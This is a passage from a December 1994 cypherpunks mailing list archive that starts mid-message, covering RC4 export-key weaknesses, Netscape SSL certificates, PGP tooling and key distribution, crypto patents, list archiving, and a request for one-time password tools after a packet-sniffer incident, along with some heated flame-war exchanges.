an equivalently strong way to ID control of a server... Amanda Walker InterCon Systems Corporation From mpjohnso at nyx10.cs.du.edu Tue Dec 13 14:00:18 1994 From: mpjohnso at nyx10.cs.du.edu (Michael Johnson) Date: Tue, 13 Dec 94 14:00:18 PST Subject: More 40-bit RC4 nonsense In-Reply-To: <199412131742.JAA27330@netcom5.netcom.com> Message-ID: <9412132159.AA08756@nyx10.cs.du.edu> Raph Levien writes: > If I recall correctly, the first byte out of the RC4 stream has >about a 40% chance of being the first byte of the key.
Thus, if the >40-bit "secret" part of the key is the _beginning_ of the full 128-bit >key, then the keyspace is effectively reduced by about seven bits, >meaning that I would be able to crack a key on my PC in a couple of >days or so. > Of course, if the "clear" 88 bits went first, there would be no >advantage whatsoever. The SSL document very carefully does not say >how they combine the two key parts to form the 128-bit key. Does >anyone know? Why did the NSA require that an application using the Sapphire Stream Cipher be limited to a _32-bit_ session key instead of the well-known _40-bit_ limit for RC4? I wonder if there are other key bit leaks that cover the other 60%? Hmmm.... From jcorgan at netcom.com Tue Dec 13 14:14:25 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 13 Dec 94 14:14:25 PST Subject: Winsock & PGP Integration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Seems to me that the UNIX model of building one mail transport >instead of 20 is a good one. If you separate out the UA from the >transport, you make it easy to fix or update the transport. I agree. > So I would suggest, rather than hacking at Winsock and >hoping to catch the right protocols, build a set of libraries that can >be called by programs. smtp.dll, for example, would be a mailer that >any mail program could call. nntp.dll would handle news, underneath >all the various interfaces. If you want to pretend to be premail, you >do it in smtp.dll. This is of course much closer to the ideal way of doing things. However, the original motivation for this project was that in order for all existing Winsock based mail agents (except for Zmail, it looks like now) to add crypto/anonymity to their functionality, some work has to be done to change them. The system I came up with to spoof Winsock would be (hopefully!) transparent, in that it would work with _existing_ mailers _today_.
To go the route you outlined, while in the long run a much more sensible way of doing things, would require the same sort of effort on the part of the current mail agents, i.e., they would need to change. Your suggestion is one I would like to follow up on; in the mean time, I am going to make an attempt at the spoofing idea. > The advantage to other programmers is that they no longer have >to do the low level stuff that they had to before. It allows >programmers to build what's interesting, namely, the interface & gizmos. Hehe. It's the user interface I hate doing the most! > Make the package do the user interface side of things, and >make a separate package to do the network protocols. Makes building, >testing, and changing things a lot easier. And while you're at it, >store all of your files as text. :) Nah. Variable bit sized binary records work well enough :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu4cV01Diok8GKihAQEQqwP/T1XQPJYPHyVZWB3sAO1Fl8TdgikW+I/6 1/XnNitgm7WwwUdadGFx0gVEzbmwN0yRbwntKV/M8wuYG+0oQ2NPBBSoBDMbUYqR OmIjUDg7P+v7X4Ga4B6MLeca6bemxYGT+Jv3F4xTQrohyUyNc+zMBR6CPWrv5d7g NQzIeTsIn/M= =Tagz -----END PGP SIGNATURE----- From mccoy at io.com Tue Dec 13 14:18:53 1994 From: mccoy at io.com (Jim McCoy) Date: Tue, 13 Dec 94 14:18:53 PST Subject: BofA+Netscape In-Reply-To: <199412131914.LAA26551@netcom10.netcom.com> Message-ID: <199412132218.QAA06065@pentagon.io.com> jamesd at netcom.com (James A. Donald) writes: [regarding Netscape and IETF work...] > > Perry, they are not in trouble. They are the number one supplier > of the internet killer app.
They are the supplier of the current app-du-jour. What things look like in five months is another issue completely. > The plug for crypto that they have placed in Netscape 0.96 is > the number one force bringing crypto awareness to the masses. Increasing use of PGP is the number one force bringing crypto awareness to the masses, Netscape is just bringing bad crypto to the masses. > He said that Netscape would look at IPSP when it was beyond > the "near" phase. [...] The correct response is "Gee that is great. > Here are some working demo systems, and some slabs of documentation." No, the correct response is to stop idiotic measures before they build up enough inertia behind them to make it difficult to prevent mistakes from being made. It is interesting that the creators of Netscape quite frequently harp on "it is us against the goliath of Microsoft, so we deserve the support of the net" and then they go out and do exactly the sort of thing that makes Microsoft so unpopular; they take advantage of their market position to force bad technology on others. jim From lmccarth at bali.cs.umass.edu Tue Dec 13 14:25:17 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 14:25:17 PST Subject: archiving cpunks Message-ID: <199412132229.RAA08472@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > I'm working on a system that indexes, marks up, and serves up html versions > of E-Mail lists. It's still very alpha stuff. cypherpunks is in the > trial part of system I call the Biblotech. All URLs that come through > the system are also indexed... [...] > Would anyone be against me doing such a thing? Allowing anyone to > view the c-punks list via html etc... The list is public and has been archived before (and maybe still is, I'm not clear on the point). Hence I don't see any grounds for objecting to your project. - - -L.
Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu4dtmf7YYibNzjpAQFkNwP/XCHjzLX8Y5VCPTsDRMnP+sc41Koe7acQ RDfT6Ojgb/Fb6rtYiBjn9aSIu57kza5rSYjVmaKljM06p2QptZ2M1Jz9jxU7rfNk BHVJSAc2Y+kbu0KqVzAVgx4o5GC41BnCoJiB9/l8iWvIgkO5pvSHTO3LlrgD15+6 kjlS5fq664Y= =nr2r - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4gTCoZzwIn1bdtAQHk1wF/XY0PbJjkuOia/lUi+11GsSFVODQLM6b1 lPEF38ufdFM157KPVWX4HI0ry7Wxr+Sm =W21x -----END PGP SIGNATURE----- From jamiel at sybase.com Tue Dec 13 14:35:49 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Tue, 13 Dec 94 14:35:49 PST Subject: IPSP and Netscape Message-ID: >One may be a reasonable inference, as I inferred >that Chomsky sought to justify mass murder and >brutal terror. The other is a lie. Somebody make him stop! Please! -j -- On the internet, no one knows you're a deity. ___________________________________________________________________ Jamie Lawrence After December 16th ---------> From lmccarth at bali.cs.umass.edu Tue Dec 13 14:44:37 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 14:44:37 PST Subject: CHOMSKY MADNESS!!! Message-ID: <199412132248.RAA08700@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- James Donald writes: > One may be a reasonable inference, as I inferred > that Chomsky sought to justify mass murder and > brutal terror. The other is a lie. Hey Eric, how about a filter that delays all messages to the list which mention Chomsky by a month or so ? - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4kpCoZzwIn1bdtAQHgDgGApDSD7Z+FZW+ykNEO8WujOFnDUhbyxSnv tyb0ZVY8mnVjmookxn19UVE8iRbLZQKU =Rwt7 -----END PGP SIGNATURE----- From db at Tadpole.COM Tue Dec 13 15:06:02 1994 From: db at Tadpole.COM (Doug Barnes) Date: Tue, 13 Dec 94 15:06:02 PST Subject: Elliptic crypto is patented In-Reply-To: Message-ID: <9412132304.AA26604@tadpole.tadpole.com> > Incidentally Next Computer's Fast Elliptic Encryption, FEE, used > elliptic curves, and is patented (by R E Crandell, USP# 5,159,632,27 October > 1992); also, elliptic crypto is probably covered by the DH/PKP patents. > Is the FEE patent on some tweaking of it, or are they claiming anything using ECs for crypto? (Esp. DH and ElGamal analogue)? PKP claims all public key, but: a) Vanilla El Gamal crypto is covered, tenuously at best, by their Diffie-Hellman patent, which some consider to be contestable based on publication more than a year before filing. The DH patent expires in a few years as well. b) EC-based El Gamal is ever farther from DH and vanilla El Gamal (since it uses different math). It is even less likely to be held to infringe. PKP's overall claim to public key cryptography may also be weakened by several different outcomes to the current round of lawsuits. One thing that is _not_ likely to be weakened is their claim on RSA. Therefore, if you're not interested in supporting PKP's attempt to make their strongest patent the centerpiece of various Internet standards, working towards EC encryption is a Good Thing. From cactus at seabsd.hks.net Tue Dec 13 15:08:26 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:08:26 PST Subject: Clarification of my remarks about Netscape Message-ID: <199412132312.SAA09000@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412131937.LAA00857 at netcom10.netcom.com>, James A. 
Donald wrote: >I am sick of you misrepresenting what I say, and I am sick of Eric >misrepresenting what I say. > >Cut it out. Excuse me, but my Ironometer just pinged itself off my desk. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4qYSoZzwIn1bdtAQHSfgGAqS3pIouxLUp0+da7igUyDpJUTuJ0Ouz9 aNIfa3Z59mJW9ZqIWnaOHuUq8s+lFMo3 =+g6l -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Tue Dec 13 15:16:08 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:16:08 PST Subject: calling all cpunks on netcom Message-ID: <199412132318.SAA09039@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412131946.LAA26053 at netcom20.netcom.com>, Shrieks wrote: >Just floating a trial balloon. Are you tired of the high traffic on >the cypherpunks list and having to wade through a ton of mail every >day? ... >Just a thought. Pheedback? % setenv NNTPSERVER nntp.hks.net % trn hks.lists.cypherpunks It's a bit slow because it has all the traffic since June. I'll implement "expire and archive" soon so it'll be faster. But it's usable (I'm using it over a 19.2 SLIP connection to our local network). I understand that pine can do something much tidier, pulling newsgroups from multiple news servers. Read yer docs fer details. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4rnyoZzwIn1bdtAQEFsAGAtecr1Ddz6GU25uZcvVPw8ohJbzxyYEnh sxqS8QBx6GU6MzcMNWydiPE3aZhoLcyk =Fsjn -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Tue Dec 13 15:22:22 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:22:22 PST Subject: calling all cpunks on netcom Message-ID: <199412132326.SAA09154@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412132147.NAA13766 at netcom12.netcom.com>, Timothy C. May wrote: >Netcom expires _all_ newsgroups, even its own ("netcom.*" local >discussion groups), in the "normal" period of 2-3 weeks. There is no >reason to expect them to make an exception for our group. If this is >not made an exception, then a 3-week hang around period will hardly >constitute an "archive." (Yes, it will reduce _some_ storage, by a >shared pool, but only temporarily.) nntp.hks.net's hks.lists.cypherpunks has back to June. We'll continue to keep at the very least one month back, even once we start archiving and expiring -- and the archives will be available by ftp. So people need only keep pointers to Message-IDs within the archives. I'll almost certainly hack something together that will retrieve articles on the Web in my copious spare time. For now all the articles are available both via nntp for newsreaders and ftp via ftp://ftp.hks.net/cypherpunks/nntp/cypherpunks/ (it's big). - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4tbyoZzwIn1bdtAQHLIAGAiAT5Vh2YJnduSJ0aJvSGDSbcBEhoIVz2 Fcjw0PfU1wlGLZsiDIiky6fEsms0EdnY =JKuL -----END PGP SIGNATURE----- From jamesd at netcom.com Tue Dec 13 15:25:53 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 15:25:53 PST Subject: IPSP and Netscape Message-ID: <199412132323.PAA06915@netcom10.netcom.com> I wrote: > > Eric and Perry have repeatedly used this method - > > not only attacking a straw man, but lying outright > > that their opponent has *explicitly* proclaimed > > the straw man. > > > > I am thoroughly sick of this dishonest debating > > tactic. > > > > If someone genuinely believe his opponent assumes > > or implies something that is obviously false he > > should say "implies" or "assumes" > > > > To say "claims" or "states" is to say something completely > > different. Perry E. Metzger writes > We're sick of you inventing facts, but of course, you'll just claim > we've been doing that. I will provide an example: Will you? You wrote: > You claim we haven't done anything and Netscape has. Where did I claim that? That is an example of a fact that you invented. Now provide an example of a fact that I invented. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From sameer at c2.org Tue Dec 13 15:26:55 1994 From: sameer at c2.org (sameer) Date: Tue, 13 Dec 94 15:26:55 PST Subject: calling all cpunks on netcom In-Reply-To: <199412132147.NAA13766@netcom12.netcom.com> Message-ID: <199412132322.PAA26201@infinity.c2.org> ObPlug: c2.org has a mail->news gateway for cypherpunks. 
(mail.cypher) -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From cactus at seabsd.hks.net Tue Dec 13 15:33:59 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:33:59 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <199412132338.SAA09286@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9412131824.AA13662 at sulphur.osf.org>, Rich Salz wrote: >> AMS is pretty strongly tied to AFS (now known as part of DCE) > >At some levels DCE's distributed file system (DFS) is "AFS version 5" (sic), >but not really. The original intent was that DFS was AFS with the IPC replaced >with secure DCE RPC, but there's a whole mess of protocol changes since then. > >They're different beasts. I stand corrected. FWIW, I was mentioning DCE mostly for context rather than any claim of interoperability. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4waCoZzwIn1bdtAQHU5wF8Cn2+2I3AmqnVPcmNTBke6jqaCNmZ0ljU FfYJlbG37TSZcKomZ2a12MG8VjuHKXgO =wkvs -----END PGP SIGNATURE----- From M.Gream at uts.EDU.AU Tue Dec 13 15:41:11 1994 From: M.Gream at uts.EDU.AU (Matthew Gream) Date: Tue, 13 Dec 94 15:41:11 PST Subject: ohh, sheesh! forget that last message. In-Reply-To: <199412131550.KAA23154@pipe3.pipeline.com> Message-ID: <199412132340.AA21926@sequoia.itd.uts.EDU.AU> d'oh. slip of the fingers, my apologies for the last message. mg.
-- Matthew Gream (sw/hw engineer) (02) 821-2043 From ianf at sydney.sgi.com Tue Dec 13 15:50:06 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 13 Dec 94 15:50:06 PST Subject: More 40-bit RC4 nonsense In-Reply-To: <199412131742.JAA27330@netcom5.netcom.com> Message-ID: <9412141041.ZM15859@wiley.sydney.sgi.com> On Dec 13, 2:59pm, Michael Johnson wrote: > Why did the NSA require that an application using the Sapphire Stream Cipher > be limited to a _32-bit_ session key instead of the well-known _40-bit_ > limit for RC4? I wonder if there are other key bit leaks that cover the other > 60%? It could also be because they've made an investment in custom hardware to "crack" RC4 by justifying it in terms of the volume which will result from the special export status, whereas the volume of sapphire use they are expecting is lower and so they'll be using off-the-shelf systems to decrypt any streams seen from it. Ian. From ianf at sydney.sgi.com Tue Dec 13 16:04:08 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 13 Dec 94 16:04:08 PST Subject: IDEA freeware In-Reply-To: <9412132014.AA12191@mycroft.rand.org> Message-ID: <9412141047.ZM15874@wiley.sydney.sgi.com> On Dec 13, 12:14pm, Jim Gillogly wrote: > If you're using PGP for non-commercial use, IDEA is free because it's > licensed for non-commercial PGP use. I'm pretty confident that you need > to get a separate IDEA license with any new product you use it in, > commercial or not. > > I have the e-mail contact address somewhere, and can post it if need be. I contacted Ascom-Tech regarding the purchase of a single-user personal licence to use IDEA. The provisions were fairly standard (ie. no guarantees of any kind), and the price was 90 sFr. Ian.
From bshantz at spry.com Tue Dec 13 16:36:32 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Tue, 13 Dec 94 16:36:32 PST Subject: Legal implications of a PGP DLL Message-ID: <9412140032.AA25902@homer.spry.com> I know this has been hashed over recently, but I never found out (or don't remember) what was decided in regards to the legal implications of a PGP functional DLL for Windows. If a company (i.e. SPRY, wink, wink, nudge, nudge.) were to write a PGP DLL and make it publicly available, would that be legal? Viacrypt just straight out charges too damn much to make it worth licensing. So, if a company wants to make its mail client PGP friendly, but not actually supply the encryption algorithm, etc. Would a DLL be legal if it were in the public domain? >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From jya at pipeline.com Tue Dec 13 16:45:12 1994 From: jya at pipeline.com (John Young) Date: Tue, 13 Dec 94 16:45:12 PST Subject: Coda for E=mc(2) Message-ID: <199412140044.TAA00854@pipe2.pipeline.com> The technical manuscript on which part of "Beyond E=mc(2)" is based was published in Physical Review A [no date given] only after five peer reviews, says the editor of The Sciences.
From hfinney at shell.portal.com Tue Dec 13 16:48:21 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 13 Dec 94 16:48:21 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412131653.AA45063@amanda.dial.intercon.com> Message-ID: <199412140047.QAA17489@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- "Amanda Walker" writes, quoting someone from Netscape: >> I didn't bother imbedding the RSA Unaffiliated User CA because I >> didn't think server operators would use it to get certificates. >Well, it's what Apple is using for PowerTalk signers (which are a key pair and >X.509 certificates, by default from the Unaffiliated User PCA). It makes >sense for personal (as opposed to organizational) servers, such as someone >running MacHTTP for their home page... >On the other hand, if RSA has set up a server PCA, that should be sufficient >for now. I wonder what the certification policy is, though--how do you prove >that you control a given server? For an Unaffiliated User CA certificate, you >just have to show a notarized application and two forms of ID, one with a >photo (driver's license, passport, etc.). I can't off hand think of an >equivalently strong way to ID control of a server... This relates to the other part of my question, which didn't get answered: what is the relationship between the name found in the X.509 certificate and the server? Does X.509 include an internet address like mcom.com, and the Netscape client checks that this matches the address of the server it is connecting to? I am not very familiar with the certificate format but I had the impression that it used a very different naming scheme. Or does the client accept any valid certificate without regard to the connection if any between the name in the certificate and the server to which it is connected? This whole area was left undefined in the SSL spec but will be important for interoperability.
Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu5AkhnMLJtOy9MBAQEFQgH/dmiiEjycULNdDCNiU8SkoB57bHv9W5Lc d+K7cBqq0ZknCwXtqZtbPTR7d8F1z0WFbMlP6QF3zywVz2GrDIg5kg== =qQ9u -----END PGP SIGNATURE----- From skaplin at skypoint.com Tue Dec 13 18:20:13 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Tue, 13 Dec 94 18:20:13 PST Subject: NEW key distribution venue up and running! Message-ID: <199412140225.VAA11077@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- After much angst the following is up and running. Special thanks to L. McCarthy and Sameer for the help. BTW-I've been having mail problems so this may show up a few times...apologies in advance. Sam Welcome!! This is the PGP public key distribution mailing list. The purpose of this list is to provide an easy and free method to distribute PGP public keys. The sole purpose of this list is to distribute PGP public keys. Any questions or problems with PGP should be posted in alt.security.pgp. All keys posted to this list are channeled to three different sources: 1) The subscribers of this list. 2) The keyservers 3) alt.security.keydist Please note that you do not have to be a subscriber to the list to post to the list. All messages addressed to pgp-public-keys at c2.org will be posted to the list. Because of this please post only PGP PUBLIC KEYS. The keyserver that this list posts to is a non-U.S.A. location. This is to provide support for all versions of PGP. A special note for users of AUTOPGP or similar utilities: AUTOPGP has the ability to directly take keys out of a mail packet. This feature coupled with this list can seamlessly update your key ring. To do this: 1) Subscribe to the list. 2) Configure AUTOPGP to automatically update your key ring. 3) Configure your offline mail reader to discard all messages coming from the list. Offline AutoPGP is Copyright (c) 1993, 1994 by Felix Shareware and the author Ståle Schumacher. All Rights Reserved.
Please direct any questions or problems to: skaplin at skypoint.com PGP encrypted mail is accepted and encouraged. - - - ----------------------------------------------------------------------------- To subscribe to the list, send a message to: majordomo at c2.org In the body of the message include: subscribe pgp-public-keys - - - ----------------------------------------------------------------------------- To unsubscribe from the list, send a message to: majordomo at c2.org In the body of the message include: unsubscribe pgp-public-keys - - - ----------------------------------------------------------------------------- ============================================================================== Life can only be understood backwards; but it must be lived forwards. - Søren Kierkegaard, "Life" ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLu5UdclnXxBRSgfNAQEWcQf9HC5s+rHX+14+ao0IhfIhdqvugDdf5YH8 VAx5oDVIyCm5HqmEp/wYRaYOnoFtIv4j7fa7jYfzvTL9tQGBfJ1ygh5KUo3r9Oqw hGn3iIkcylGquz/cvh2JUBFTowdueSII4180Bbj1xIElQJG2nPSh1KeALIjWqHJS Ch4nSnzwZaVCaY+tITTVTsWezX14UXjmITXU0TG2OpQaMC+Unzlj7EiWWQyqQ/k5 4UIGGLajPaif1AKyZBcv0anxrW88Wcfx16c2giV9sS7+3v6OWI2ItQMo94LfnWnl j78gmXW0dQ3+IIPs+0WmQsghFpPHXwMbtqnLa8O4IRcWMPGmJIxo4A== =bw2k - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu5XWyoZzwIn1bdtAQG7VgF/a7W7C0N3rwSf+RxurCmreBjsjQmP4DEj Kq+TpEQDjhwOvDgh+OLunv93rNr3IKI2 =+3lV -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Tue Dec 13 18:38:35 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 18:38:35 PST Subject: Brands excluded from digicash beta In-Reply-To: Message-ID: <199412140243.VAA11280@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Nathaniel Borenstein wrote in the middle of his novel: >It is not a coincidence that we are the first (and so > far, still the only) system that is operational with real money. Why do you keep claiming this? It wins you no points in this forum: people know better. Bibliobytes/HKS' system has been in operation since June, processesing orders for soft matter. NetMarket's system has been on-line and working since August, taking orders for CDs and flowers. Etc, etc... - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu5bvSoZzwIn1bdtAQFpsQGAy+fPx09OYW7TGKpqYrX+KtmjakvDnPie SZhiKZLvV/oPV/FITSaDWlb9qb/H5IX+ =vakz -----END PGP SIGNATURE----- From anonymous-remailer at replay.com Tue Dec 13 19:01:26 1994 From: anonymous-remailer at replay.com (Name withheld on request) Date: Tue, 13 Dec 94 19:01:26 PST Subject: No Subject Message-ID: <199412140302.AA05947@xs1.xs4all.nl> perry shut the fuck up you arrogant dweeb From loki at nately.UCSD.EDU Tue Dec 13 19:26:29 1994 From: loki at nately.UCSD.EDU (Lance Cottrell) Date: Tue, 13 Dec 94 19:26:29 PST Subject: Emergency! Need single use passwords! Message-ID: <9412140329.AA27612@nately.UCSD.EDU> -----BEGIN PGP SIGNED MESSAGE----- Hi all. We discovered that someone has been running a packet sniffer on our subnet of several dozen computers. He has all the passwords. This is my chance to try to get single use password login programs installed here. Please give me recomendations and ftp locations. Thanks. - ---------------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche - ---------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu5mUFVkk3dax7hlAQGP9gP8DB5WGmLQsSR6AGPTKkPMOqyAew+NDsiE ftwsDXJV2ijZfabkY+2V84ea4lDLku7BPmz+5p4gI7E2ezDFHgJ/bQ/cDspsjZoO EzmqiJqJGkCNggFdKzD29jsU1v+icZEdMOuwGZ7rMKEAfCtBCmT9X8Uvk4q7S+YO udLS1eGddAY= =7gbf -----END PGP SIGNATURE----- From warlord at MIT.EDU Tue Dec 13 19:41:17 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Tue, 13 Dec 94 19:41:17 PST Subject: Emergency! Need single use passwords! In-Reply-To: <9412140329.AA27612@nately.UCSD.EDU> Message-ID: <9412140341.AA01961@toxicwaste.media.mit.edu> I highly recommend Kerberos. 
It is available via anonymous ftp from athena-dist.mit.edu:/pub/ATHENA/kerberos (I believe -- they've changed the site around recently). Alternatively you can get CNS from Cygnus Support, which is a more up-to-date Kerberos release. NOTE: Kerberos is a network authentication system based upon DES and a secure server. It requires that the Kerberos server remain secure, but that tends not to be too much of a problem if you have some machine that you can lock away in a machine room somewhere. No useful information is sent over the net in clear-text, so it solves your sniffer problem as well. Hope this helps. -derek From lmccarth at ducie.cs.umass.edu Tue Dec 13 20:51:19 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 20:51:19 PST Subject: Using HotWIRED without provoking junk mail Message-ID: <199412140456.XAA12500@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > I get enough junk mail already, and I don't want vendors to be able to > capture market research at the browsing level (I haven't > looked at WIRED's server for precisely this reason). A while back someone established a HotWIRED account in the name "cypherpunks" with password "cypherpunks" to get around this. I make a point of mentioning that whenever I point someone to HotWIRED. I'm assuming here that they're not collecting identification data in some other way (if you're not using Netscape ;). - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu55rGf7YYibNzjpAQExGwP/S0ahTCimJlYKQCK1DGjHbdSxcaovbHHI Ybtcw8iaGwYZxmEWcK5fM8tRqORV99oGUISdynMrFCw0VV+cvozot4q+GSMCpcND uIsSgkw/D3F3XWfWLtJDocme3Joot1cARfmo6lj7YmqBjHS2e27OOke8BQ2JeOBh 3wceidNaEKk= =fWzB - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. 
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu564ioZzwIn1bdtAQExZwF9EEHP+++Y3ODxhxSZPY3IeVSC0JtOc7vc xu2avrEaeNetk0yPogy1+tmjwb6JC2e8 =qVmS -----END PGP SIGNATURE----- From ddt at lsd.com Tue Dec 13 21:08:11 1994 From: ddt at lsd.com (ddt at lsd.com) Date: Tue, 13 Dec 94 21:08:11 PST Subject: No Subject Message-ID: X-PGP Key ID: 4AAF00E5 X-PGP Fprint: 30D81F3484E6A83F 6EC8D7F0CAB3D265 Date: Tue, 13 Dec 1994 21:08:38 -0800 To: cypherpunks at toad.com From: ddt at lsd.com (Dave Del Torto) Subject: KEYSRVR: remove w/o revoke? -----BEGIN PGP SIGNED MESSAGE----- A Keyserver Dilemma: Through the good graces of one Craig Steinberger, I discovered that the keyserver Michael Graff runs at Iowa State has an old, defunct key for me. Naturally, I've tried to update it, but am not sure if I was successful yet, but here's my question: Is there a mechanism for deleting your own key from a keyserver's ring without revoking it? I think not, on the surface of it, it goes against general key hygiene procedures. History: I sent that 512 key to two people almost two years ago as a test and never used it since. Apparently it got put on someone's keyring and transferred to Iowa at some point. (Note: _I_ never added it to any keyserver, so there's a problem with posting other people's keys and not telling them that also needs addressing here.) Now, since I never expected to use that key again, I deleted the secret half of the pair, and hence am unable to revoke it. Asking Michael nicely to remove it from Iowa (which requires a certain measure of trust most keyserver-owners might not extend under normal conditions) is fine. But what about all the 